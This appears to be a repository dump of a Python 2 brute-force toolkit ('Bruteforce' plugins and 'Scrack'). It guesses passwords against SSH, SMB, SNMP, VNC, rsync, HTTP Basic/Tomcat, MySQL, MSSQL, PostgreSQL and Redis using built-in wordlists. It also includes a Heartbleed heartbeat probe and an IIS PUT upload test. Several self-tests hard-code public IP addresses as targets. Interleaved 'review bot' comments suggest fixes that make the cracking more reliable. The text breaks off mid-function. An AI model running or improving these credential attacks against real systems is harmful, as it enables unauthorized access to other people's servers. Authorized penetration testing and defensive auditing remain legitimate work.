if timeout != -999:
self.timeout = timeout
self.sock = socket.create_connection((self.host, self.port), self.timeout)
self.af = self.sock.family
self.file = self.sock.makefile('rb')
self.server_protocol_version = self.getresp()
self.protocol_version = self.server_protocol_version[-2:]
return self.server_protocol_version
def set_debuglevel(self, level):
'''Set the debugging level.
The required argument level means:
0: no debugging output (default)
1: print commands and responses but not body text etc.
'''
self.debugging = level
debug = set_debuglevel
# Internal: send one line to the server, appending LF
def putline(self, line):
line = line + LF
if self.debugging > 1: print '*put*', line
self.sock.sendall(line)
# Internal: return one line from the server, stripping LF.
# Raise EOFError if the connection is closed
def getline(self):
line = self.file.readline(self.maxline + 1)
if len(line) > self.maxline:
raise Error("got more than %d bytes" % self.maxline)
if self.debugging > 1:
print '*get*', line
if not line: raise EOFError
if line[-2:] == CRLF: line = line[:-2]
elif line[-1:] in CRLF: line = line[:-1]
return line
# Internal: get a response from the server, which may possibly
# consist of multiple lines. Return a single string with no
# trailing CRLF. If the response consists of multiple lines,
# these are separated by '\n' characters in the string
def getmultiline(self):
line = self.getline()
return line
# Internal: get a response from the server.
# Raise various errors if the response indicates an error
def getresp(self):
resp = self.getmultiline()
if self.debugging: print '*resp*', resp
if resp.find('ERROR') != -1:
raise Error, resp
else:
return resp
def sendcmd(self, cmd):
'''Send a command and return the response.'''
self.putline(cmd)
return self.getresp()
def login(self, module='', user = '', passwd = ''):
if not user: user = 'www'
if not passwd: passwd = 'www'
if not module: module = 'www'
self.putline(self.server_protocol_version)
# self.putline('@RSYNCD: 28.0')
# self.protocol_version = 28
resp = self.sendcmd(module)
challenge = resp[resp.find('AUTHREQD ')+9:]
if self.protocol_version >= 30:
md5=hashlib.md5()
md5.update(passwd)
md5.update(challenge)
hash = base64.b64encode(md5.digest())
else:
md4=hashlib.new('md4')
tmp = '\0\0\0\0' + passwd + challenge
md4.update(tmp)
hash = base64.b64encode(md4.digest())
response, number = re.subn(r'=+$','',hash)
print response
resp = self.sendcmd(user + ' ' + response)
if resp.find('OK') == -1:
raise Error, resp
return resp
def getModules(self):
'''Get modules on the server'''
print self.server_protocol_version
self.putline(self.server_protocol_version)
resp = self.sendcmd('')
print resp
return resp
def close(self):
'''Close the connection without assuming anything about it.'''
self.putline('')
if self.file is not None:
self.file.close()
if self.sock is not None:
self.sock.close()
self.file = self.sock = None
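Review bot: `connect` stores `self.protocol_version = self.server_protocol_version[-2:]` as a string, so the `if self.protocol_version >= 30:` test in `login` compares str with int — always true under Python 2's mixed-type ordering and a TypeError under Python 3 — so the pre-30 MD4 branch can never be taken; store `int(self.server_protocol_version[-2:])` (or parse the `@RSYNCD: NN.N` banner with a regex). `login` prints the computed authentication response to stdout at `print response`, and `getModules` prints the banner and reply; both are debug output that should be gated on `self.debugging`. `hash_md4`/`hash_md5` at module level are computed and never used, and `login` shadows the builtin `hash`. `close` sends an empty line before checking `self.file`, so it raises if `connect` was never called or already failed.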


72
Bruteforce/plugins/smb.py Normal file

@ -0,0 +1,72 @@
#coding=utf-8
import time
import threading
from printers import printPink,printGreen
from impacket.smbconnection import *
from multiprocessing.dummy import Pool
from threading import Thread
class smb_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/smb.conf")
def smb_connect(self,ip,username,password):
crack =0
try:
smb = SMBConnection('*SMBSERVER', ip)
smb.login(username,password)
smb.logoff()
crack =1
except Exception, e:
self.lock.acquire()
print "%s smb 's %s:%s login fail " %(ip,username,password)
self.lock.release()
return crack
def smb_l(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
if self.smb_connect(ip,username,password)==1:
self.lock.acquire()
printGreen("%s smb at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s smb at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['smb']):
printPink("crack smb now...")
print "[*] start crack smb serice %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['smb']:
pool.apply_async(func=self.smb_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop smb serice %s" % time.ctime()
print "[*] crack smb done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'smb': ['10.211.55.3:445']}
pinglist=['101.201.177.35']
test=smb_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")
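Review bot: `smb_connect` drops the `port` that `smb_l` received — `smb = SMBConnection('*SMBSERVER', ip)` always connects on the library default while the report prints `port`; pass it through as `SMBConnection('*SMBSERVER', ip, sess_port=port, timeout=8)` so non-default ports are actually tested and a dead host does not block the worker. Every exception, including connection refused and timeouts, is printed as "login fail" and the loop continues with the next credential, so an unreachable host is retried for the full wordlist; distinguish `impacket.smbconnection.SessionError` (authentication) from socket errors and break on the latter, as `mysql_connect` and `ssh_connect` do. The `__main__` self-test hard-codes a specific address; make it a lab-host placeholder.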

Bruteforce/plugins/smb.pyc Normal file


@ -0,0 +1,65 @@
#coding=utf-8
import time
import threading
from printers import printPink,printGreen
from multiprocessing.dummy import Pool
from pysnmp.entity.rfc3413.oneliner import cmdgen
class snmp_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/snmp.conf")
def snmp_connect(self,ip,key):
crack =0
try:
errorIndication, errorStatus, errorIndex, varBinds =\
cmdgen.CommandGenerator().getCmd(
cmdgen.CommunityData('my-agent',key, 0),
cmdgen.UdpTransportTarget((ip, 161)),
(1,3,6,1,2,1,1,1,0)
)
if varBinds:
crack=1
except:
pass
return crack
def snmp_l(self,ip,port):
try:
for data in self.lines:
flag=self.snmp_connect(ip,key=data)
if flag==1:
self.lock.acquire()
printGreen("%s snmp has weaken password!!-----%s\r\n" %(ip,data))
self.result.append("%s snmp has weaken password!!-----%s\r\n" %(ip,data))
self.lock.release()
break
else:
self.lock.acquire()
print "test %s snmp's scan fail" %(ip)
self.lock.release()
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
printPink("crack snmp now...")
print "[*] start crack snmp %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in pinglist:
pool.apply_async(func=self.snmp_l,args=(str(ip).split(':')[0],""))
pool.close()
pool.join()
print "[*] stop crack snmp %s" % time.ctime()
print "[*] crack snmp done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
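Review bot: `snmp_connect` trusts `varBinds` alone and ignores `errorIndication` and `errorStatus`; with the pysnmp one-liner API `varBinds` can be non-empty alongside an error status (a noSuchName reply, for example), so a community string may be reported as valid on a reply that was not a successful GET. Check `if not errorIndication and not errorStatus and varBinds:` before setting `crack=1`. The bare `except:` below it swallows KeyboardInterrupt as well as real errors; use `except Exception:`. `snmp_connect` also hard-codes port 161 while `run` passes `""` as the port to `snmp_l`, and `run` iterates `pinglist` rather than `ipdict` — a deliberate difference from the other plugins (UDP is not in the TCP port scan) that deserves a one-line comment, e.g. `# SNMP is UDP and not port-scanned, so try every host that answered ping`.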

Bruteforce/plugins/snmp.pyc Normal file


84
Bruteforce/plugins/ssh.py Normal file

@ -0,0 +1,84 @@
#coding=utf-8
import time
import threading
from multiprocessing.dummy import Pool
from printers import printPink,printGreen
import paramiko
class ssh_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/ssh.conf")
def ssh_connect(self,ip,username,password,port):
crack=0
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(ip,port,username=username, password=password)
crack=1
client.close()
except Exception,e:
if e[0]=='Authentication failed.':
self.lock.acquire()
print "%s ssh service 's %s:%s login fail " %(ip,username,password)
self.lock.release()
else:
self.lock.acquire()
print "connect %s ssh service at %s login fail " %(ip,port)
self.lock.release()
crack=2
return crack
def ssh_l(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
flag=self.ssh_connect(ip,username,password,port)
if flag==2:
break
if flag==1:
self.lock.acquire()
printGreen("%s ssh at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s ssh at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['ssh']):
printPink("crack ssh now...")
print "[*] start crack ssh %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['ssh']:
pool.apply_async(func=self.ssh_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop ssh serice %s" % time.ctime()
print "[*] crack ssh done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'ssh': ['139.129.30.58:22']}
pinglist=['122.225.81.129']
test=ssh_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")
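Review bot: `client.connect(ip,port,username=username, password=password)` is called without `timeout=`, `allow_agent=False` or `look_for_keys=False`, so an unresponsive host blocks the worker indefinitely and paramiko first offers the local agent and `~/.ssh` keys — if one of those is accepted, the host is recorded as having a weak password for a credential that was never used. Use `client.connect(ip, port, username=username, password=password, timeout=8, allow_agent=False, look_for_keys=False)`. The classification `e[0]=='Authentication failed.'` matches the exception's message text; `isinstance(e, paramiko.AuthenticationException)` is the stable check, with any other `paramiko.SSHException` or socket error being the "cannot connect" case that sets `crack=2`. The `__main__` block hard-codes a public address as its target; use a lab-host placeholder.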

Bruteforce/plugins/ssh.pyc Normal file


@ -0,0 +1,145 @@
#!/usr/bin/python
import sys
import struct
import socket
import select
import time
import threading
from printers import printPink,printRed
from multiprocessing.dummy import Pool
class ssl_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.hello = self.h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
self.hb = self.h2bin('''
18 03 02 00 03
01 40 00
''')
def h2bin(self,x):
return x.replace(' ', '').replace('\n', '').decode('hex')
def recvall(self,s, length, timeout=8):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(self,s):
hdr = self.recvall(s, 5)
if hdr is None:
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = self.recvall(s, ln, 10)
return typ, ver, pay
def hit_hb(self,s,ip,port):
s.send(self.hb)
while True:
typ, ver, pay = self.recvmsg(s)
if typ is None:
return False
if typ == 24:
if len(pay) > 3:
self.lock.acquire()
printRed('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port))
self.result.append('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port))
self.lock.release()
else:
self.lock.acquire()
printRed('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port))
self.result.append('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port))
self.lock.release()
return True
if typ == 21:
return False
def openssl_test(self,ip,port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sys.stdout.flush()
s.connect((ip, port))
sys.stdout.flush()
s.send(self.hello)
sys.stdout.flush()
while True:
typ, ver, pay = self.recvmsg(s)
if typ == None:
break
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
sys.stdout.flush()
s.send(self.hb)
self.hit_hb(s,ip,port)
except Exception,e:
#print e
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['ssl']):
printPink("crack ssl now...")
print "[*] start test openssl_heart %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['ssl']:
pool.apply_async(func=self.openssl_test,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop ssl serice %s" % time.ctime()
print "[*] crack ssl done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'ssl': ['222.22.224.142:443']}
pinglist=['122.225.81.129']
test=ssl_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")
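Review bot: `openssl_test` creates the socket without a timeout and never closes it: `s.connect((ip, port))` can block a worker indefinitely, and none of the paths (exception, the `break`s, after `hit_hb`) call `s.close()`, so a 50-thread pool leaks a descriptor per host; add `s.settimeout(8)` after `socket.socket(...)` and close it in a `finally:` block. The heartbeat record is sent twice — once at `s.send(self.hb)` in `openssl_test` and again at the top of `hit_hb` — so the second send is redundant. `hit_hb` only records positive results, so a host that answered with an alert (`typ == 21`) or timed out leaves no line at all, and operators cannot tell "tested, not affected" from "not tested"; append a negative line to `self.result` as well. The ClientHello is pinned to TLS 1.1 (`16 03 02`), so servers that only negotiate other versions answer with an alert and are silently reported as nothing; a comment such as `# ClientHello is TLS 1.1 only; other-version-only servers are not tested` would make that limitation explicit.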


74
Bruteforce/plugins/vnc.py Normal file

@ -0,0 +1,74 @@
from printers import printPink,printGreen
import time
import threading
from multiprocessing.dummy import Pool
from vnclib import *
class vnc_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/vnc.conf")
def vnc_connect(self,ip,port,password):
crack =0
try:
v = VNC()
v.connect(ip, port, 10)
code,mesg=v.login(password)
if mesg=='OK':
crack=1
except Exception,e:
crack=2
pass
return crack
def vnc_l(self,ip,port):
try:
for data in self.lines:
flag=self.vnc_connect(ip=ip,port=port,password=data)
if flag==2:
self.lock.acquire()
print "%s vnc at %s not allow connect now because of too many security failure" %(ip,port)
self.lock.release()
break
if flag==1:
self.lock.acquire()
printGreen("%s vnc at %s has weaken password!!-----%s\r\n" %(ip,port,data))
self.result.append("%s vnc at %s has weaken password!!-----%s\r\n" %(ip,port,data))
self.lock.release()
break
else:
self.lock.acquire()
print "login %s vnc service with %s fail " %(ip,data)
self.lock.release()
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['vnc']):
printPink("crack vnc now...")
print "[*] start crack vnc %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['vnc']:
pool.apply_async(func=self.vnc_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop vnc serice %s" % time.ctime()
print "[*] crack vnc done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
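Review bot: `vnc_connect` maps every exception to `crack=2`, which `vnc_l` reports as "not allow connect now because of too many security failure"; a refused connection, a timeout, and the `VNC_Error` that `vnclib.login` raises when no 16-byte challenge comes back (its own message suggests "No authentication required") all produce that same misleading line, and the no-authentication case — the finding a defender most needs — is never written to `self.result`. Catch `VNC_Error` separately with its own return code and let socket errors be a third code, so the loop can stop on unreachable hosts without claiming a lockout. As committed the plugin cannot report anything, because `vnclib` never imports `socket` and `VNC().connect` therefore raises NameError into this `except`; the `__main__` self-test the other plugins carry is absent here and would have surfaced that.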

Bruteforce/plugins/vnc.pyc Normal file


@ -0,0 +1,97 @@
__author__ = 'wilson'
from Crypto.Cipher import DES
from sys import version_info
import time
class VNC_Error(Exception):
pass
class VNC:
def connect(self, host, port, timeout):
self.fp = socket.create_connection((host, port), timeout=timeout)
resp = self.fp.recv(99) # banner
self.version = resp[:11].decode('ascii')
if len(resp) > 12:
raise VNC_Error('%s %s' % (self.version, resp[12:].decode('ascii', 'ignore')))
return self.version
def login(self, password):
major, minor = self.version[6], self.version[10]
if (major, minor) in [('3', '8'), ('4', '1')]:
proto = b'RFB 003.008\n'
elif (major, minor) == ('3', '7'):
proto = b'RFB 003.007\n'
else:
proto = b'RFB 003.003\n'
self.fp.sendall(proto)
time.sleep(0.5)
resp = self.fp.recv(99)
if minor in ('7', '8'):
code = ord(resp[0:1])
if code == 0:
raise VNC_Error('Session setup failed: %s' % resp.decode('ascii', 'ignore'))
self.fp.sendall(b'\x02') # always use classic VNC authentication
resp = self.fp.recv(99)
else: # minor == '3':
code = ord(resp[3:4])
if code != 2:
raise VNC_Error('Session setup failed: %s' % resp.decode('ascii', 'ignore'))
resp = resp[-16:]
if len(resp) != 16:
raise VNC_Error('Unexpected challenge size (No authentication required? Unsupported authentication type?)')
pw = password.ljust(8, '\x00')[:8] # make sure it is 8 chars long, zero padded
key = self.gen_key(pw)
des = DES.new(key, DES.MODE_ECB)
enc = des.encrypt(resp)
self.fp.sendall(enc)
resp = self.fp.recv(99)
self.fp.close()
code = ord(resp[3:4])
mesg = resp[8:].decode('ascii', 'ignore')
if code == 1:
return code, mesg or 'Authentication failure'
elif code == 0:
return code, mesg or 'OK'
else:
raise VNC_Error('Unknown response: %s (code: %s)' % (repr(resp), code))
def gen_key(self, key):
newkey = []
for ki in range(len(key)):
bsrc = ord(key[ki])
btgt = 0
for i in range(8):
if bsrc & (1 << i):
btgt = btgt | (1 << 7-i)
newkey.append(btgt)
if version_info[0] == 2:
return ''.join(chr(c) for c in newkey)
else:
return bytes(newkey)

Binary file not shown.

119
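--- a/Bruteforce/plugins/web.py
+++ b/Bruteforce/plugins/web.py
@@ -0,0 +1,119 @@
+#coding=utf-8
+import threading
+from printers import printPink,printRed,printGreen
+from multiprocessing.dummy import Pool
+import requests
+import socket
+import httplib
+import time
+import urlparse
+import urllib2
+import re
+import base64
+class web_burp(object):
+def __init__(self,c):
+self.config=c
+self.lock=threading.Lock()
+self.result=[]
+self.tomcatlines=self.config.file2list("conf/tomcat.conf")
+self.weblines=self.config.file2list("conf/web.conf")
+def weblogin(self,url,ip,port,username,password):
+try:
+creak=0
+header={}
+login_pass=username+':'+password
+header['Authorization']='Basic '+base64.encodestring(login_pass)
+#header base64.encodestring 会多加一个回车号
+header['Authorization']=header['Authorization'].replace("\n","")
+r=requests.get(url,headers=header,timeout=8)
+if r.status_code==200:
+self.result.append("%s service at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+self.lock.acquire()
+printGreen("%s service at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+self.lock.release()
+creak=1
+else:
+self.lock.acquire()
+print "%s service 's %s:%s login fail " %(ip,username,password)
+self.lock.release()
+except Exception,e:
+pass
+return creak
+def webmain(self,ip,port):
+#iis_put vlun scann
+try:
+url='http://'+ip+':'+str(port)+'/'+str(time.time())+'.txt'
+r = requests.put(url,data='hi~',timeout=10)
+if r.status_code==201:
+self.lock.acquire()
+printGreen('%s has iis_put vlun at %s\r\n' %(ip,port))
+self.lock.release()
+self.result.append('%s has iis_put vlun at %s\r\n' %(ip,port))
+except Exception,e:
+#print e
+pass
+#burp 401 web
+try:
+url='http://'+ip+':'+str(port)
+url_get=url+'/manager/html'
+r=requests.get(url_get,timeout=8)#tomcat
+r2=requests.get(url,timeout=8)#web
+if r.status_code==401:
+for data in self.tomcatlines:
+username=data.split(':')[0]
+password=data.split(':')[1]
+flag=self.weblogin(url_get,ip,port,username,password)
+if flag==1:
+break
+elif r2.status_code==401:
+for data in self.weblines:
+username=data.split(':')[0]
+password=data.split(':')[1]
+flag=self.weblogin(url,ip,port,username,password)
+if flag==1:
+break
+else:
+pass
+except Exception,e:
+pass
+def run(self,ipdict,pinglist,threads,file):
+if len(ipdict['http']):
+print "[*] start test web burp at %s" % time.ctime()
+starttime=time.time()
+pool=Pool(threads)
+for ip in ipdict['http']:
+pool.apply_async(func=self.webmain,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
+pool.close()
+pool.join()
+print "[*] stop test iip_put&&scanner web paths at %s" % time.ctime()
+print "[*] test iip_put&&scanner web paths done,it has Elapsed time:%s " % (time.time()-starttime)
+for i in xrange(len(self.result)):
+self.config.write_file(contents=self.result[i],file=file)
+if __name__ == '__main__':
+import sys
+sys.path.append("../")
+from comm.config import *
+c=config()
+ipdict={'http': ['192.168.1.1:80']}
+pinglist=['192.168.1.1']
+test=web_burp(c)
+test.run(ipdict,pinglist,50,file="../result/test")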
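Review bot: In weblogin and webmain the lock is taken with explicit acquire()/release() inside a try whose handler swallows every exception, so if printGreen raises while the lock is held it is never released and every other worker in the Pool blocks on its next print; `with self.lock:` around the print makes the release unconditional. The PUT probe in webmain writes a timestamp-named file to the target and neither removes it nor records the created URL in self.result, so an authorized test leaves an untracked artifact behind — at minimum append the URL to the result so it can be cleaned up afterwards. `pinglist` is accepted by run but never read; if it is part of a shared plugin signature a one-line comment saying so would spare the next reader a search, otherwise drop it. The `__main__` self-test runs a live scan against a hard-coded address when the module is executed directly; a comment marking it as a manual test hook would make that explicit.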

BIN
Bruteforce/plugins/web.pyc Normal file

Binary file not shown.


@ -0,0 +1,12 @@
MySQL-python 1.2.4
pymssql 2.1.1
impacket
requests
pysnmp 4.2.5
pycrypto 2.6.1
paramiko 1.1.5
python-ldap 2.4.13
pymongo 2.4
psycopg2
redis
IPy

BIN
Bruteforce/result/.DS_Store vendored Normal file

Binary file not shown.

24
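--- a/Scrack/README.md
+++ b/Scrack/README.md
@@ -0,0 +1,24 @@
+# Scrack(服务弱口令检测脚本)
+1. 功能
+一款python编写的轻量级弱口令检测脚本目前支持以下服务FTP、MYSQL、MSSQL、MONGODB、REDIS、TELNET、ELASTICSEARCH、POSTGRESQL。
+2. 特点
+命令行、单文件,绿色方便各种情况下的使用。
+无需任何外库以及外部程序支持所有协议均采用socket与内置库进行检测。
+兼容OSX、LINUX、WINDOWSPython 2.6+(更低版本请自行测试,理论上均可运行)。
+3. 参数说明
+python Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10]
+-h 必须输入的参数支持ip(192.168.1.1)ip段192.168.1ip范围指定192.168.1.1-192.168.1.254,ip列表文件ip.ini最多限制一次可扫描65535个IP。
+-p 指定要扫描端口列表,多个端口使用,隔开 例如1433,3306,5432。未指定即使用内置默认端口进行扫描(21,23,1433,3306,5432,6379,9200,11211,27017)
+-m 指定线程数量 默认100线程
+-t 指定请求超时时间。
+-d 指定密码字典。
+-n 不进行存活探测(ICMP)直接进行扫描。
+4. 使用例子
+python Scrack.py -h 10.111.1
+python Scrack.py -h 192.168.1.1 -d pass.txt
+python Scrack.py -h 10.111.1.1-10.111.2.254 -p 3306,5432 -m 200 -t 6
+python Scrack.py.py -h ip.ini -n
+5. 法律声明
+此脚本仅可用于授权的渗透测试以及自身的安全检测中。
+此脚本仅用于学习以及使用,可自由进行改进,禁止提取加入任何有商业行为的产品中。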

521
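--- a/Scrack/Scrack.py
+++ b/Scrack/Scrack.py
@@ -0,0 +1,521 @@
+#coding:utf-8
+import getopt
+import sys
+import Queue
+import threading
+import socket
+import urllib2
+import time
+import os
+import re
+import ftplib
+import hashlib
+import struct
+import binascii
+import telnetlib
+import array
+queue = Queue.Queue()
+mutex = threading.Lock()
+TIMEOUT = 10
+I = 0
+USER_DIC = {
+"ftp":['www','admin','root','db','wwwroot','data','web','ftp'],
+"mysql":['root'],
+"mssql":['sa'],
+"telnet":['administrator','admin','root','cisco'],
+"postgresql":['postgres','admin'],
+"redis":['null'],
+"mongodb":['null'],
+"memcached":['null'],
+"elasticsearch":['null']
+}
+PASSWORD_DIC = ['123456','admin','root','password','123123','123','1','{user}','{user}{user}','{user}1','{user}123','{user}2016','{user}2015','{user}!','','P@ssw0rd!!','qwa123','12345678','test','123qwe!@#','123456789','123321','1314520','666666','woaini','fuckyou','000000','1234567890','8888888','qwerty','1qaz2wsx','abc123','abc123456','1q2w3e4r','123qwe','159357','p@ssw0rd','p@55w0rd','password!','p@ssw0rd!','password1','r00t','tomcat','apache','system']
+REGEX = [['ftp', '21', '^220.*?ftp|^220-|^220 Service|^220 FileZilla'], ['telnet', '23', '^\\xff[\\xfa-\\xfe]|^\\x54\\x65\\x6c|Telnet'],['mssql', '1433', ''], ['mysql', '3306', '^.\\0\\0\\0.*?mysql|^.\\0\\0\\0\\n|.*?MariaDB server'], ['postgresql', '5432', ''], ['redis', '6379', '-ERR|^\\$\\d+\\r\\nredis_version'], ['elasticsearch', '9200', ''], ['memcached', '11211', '^ERROR'], ['mongodb', '27017', '']]
+class Crack():
+def __init__(self,ip,port,server,timeout):
+self.ip = ip
+self.port = port
+self.server = server
+self.timeout = timeout
+def run(self):
+user_list = USER_DIC[self.server]
+#print user_list
+for user in user_list:
+for pass_ in PASSWORD_DIC:
+pass_ = str(pass_.replace('{user}', user))
+k = getattr(self,self.server)
+result = k(user,pass_)
+if result:return result
+def ftp(self,user,pass_):
+try:
+ftp=ftplib.FTP()
+ftp.connect(self.ip,self.port)
+ftp.login(user,pass_)
+if user == 'ftp':return "anonymous"
+return "username:%s,password:%s"%(user,pass_)
+except Exception,e:
+pass
+def mysql(self,user,pass_):
+sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+sock.connect((self.ip,int(self.port)))
+packet = sock.recv(254)
+plugin,scramble = self.get_scramble(packet)
+if not scramble:return 3
+auth_data = self.get_auth_data(user,pass_,scramble,plugin)
+sock.send(auth_data)
+result = sock.recv(1024)
+if result == "\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00":
+return "username:%s,password:%s" % (user,pass_)
+def postgresql(self,user,pass_):#author:hos@YSRC
+try:
+sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+sock.connect((self.ip,int(self.port)))
+packet_length = len(user) + 7 +len("\x03user database postgres application_name psql client_encoding UTF8 ")
+p="%c%c%c%c%c\x03%c%cuser%c%s%cdatabase%cpostgres%capplication_name%cpsql%cclient_encoding%cUTF8%c%c"%( 0,0,0,packet_length,0,0,0,0,user,0,0,0,0,0,0,0,0)
+sock.send(p)
+packet = sock.recv(1024)
+psql_salt=[]
+if packet[0]=='R':
+a=str([packet[4]])
+b=int(a[4:6],16)
+authentication_type=str([packet[8]])
+c=int(authentication_type[4:6],16)
+if c==5:psql_salt=packet[9:]
+else:return 3
+buf=[]
+salt = psql_salt
+lmd5= self.make_response(buf,user,pass_,salt)
+packet_length1=len(lmd5)+5+len('p')
+pp='p%c%c%c%c%s%c'%(0,0,0,packet_length1 - 1,lmd5,0)
+sock.send(pp)
+packet1 = sock.recv(1024)
+if packet1[0] == "R":
+return "username:%s,password:%s" % (user,pass_)
+except Exception,e:
+return 3
+def redis(self,user,pass_):
+try:
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((self.ip,int(self.port)))
+s.send("INFO\r\n")
+result = s.recv(1024)
+if "redis_version" in result:
+return "unauthorized"
+elif "Authentication" in result:
+for pass_ in PASSWORD_DIC:
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((self.ip,int(self.port)))
+s.send("AUTH %s\r\n"%(pass_))
+result = s.recv(1024)
+if '+OK' in result:
+return "username:%s,password:%s" % (user,pass_)
+except Exception,e:
+return 3
+def mssql(self,user,pass_):#author:hos@YSRC
+try:
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((self.ip,self.port))
+hh=binascii.b2a_hex(self.ip)
+husername=binascii.b2a_hex(user)
+lusername=len(user)
+lpassword=len(pass_)
+ladd=len(self.ip)+len(str(self.port))+1
+hladd=hex(ladd).replace('0x','')
+hpwd=binascii.b2a_hex(pass_)
+pp=binascii.b2a_hex(str(self.port))
+address=hh+'3a'+pp
+hhost= binascii.b2a_hex(self.ip)
+data="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"
+data1=data.replace(data[16:16+len(address)],address)
+data2=data1.replace(data1[78:78+len(husername)],husername)
+data3=data2.replace(data2[140:140+len(hpwd)],hpwd)
+if lusername>=16:
+data4=data3.replace('0X',str(hex(lusername)).replace('0x',''))
+else:
+data4=data3.replace('X',str(hex(lusername)).replace('0x',''))
+if lpassword>=16:
+data5=data4.replace('0Y',str(hex(lpassword)).replace('0x',''))
+else:
+data5=data4.replace('Y',str(hex(lpassword)).replace('0x',''))
+hladd = hex(ladd).replace('0x', '')
+data6=data5.replace('ZZ',str(hladd))
+data7=binascii.a2b_hex(data6)
+sock.send(data7)
+packet=sock.recv(1024)
+if 'master' in packet:
+return "username:%s,password:%s" % (user,pass_)
+except:
+return 3
+def mongodb(self,user,pass_):
+try:
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((self.ip,int(self.port)))
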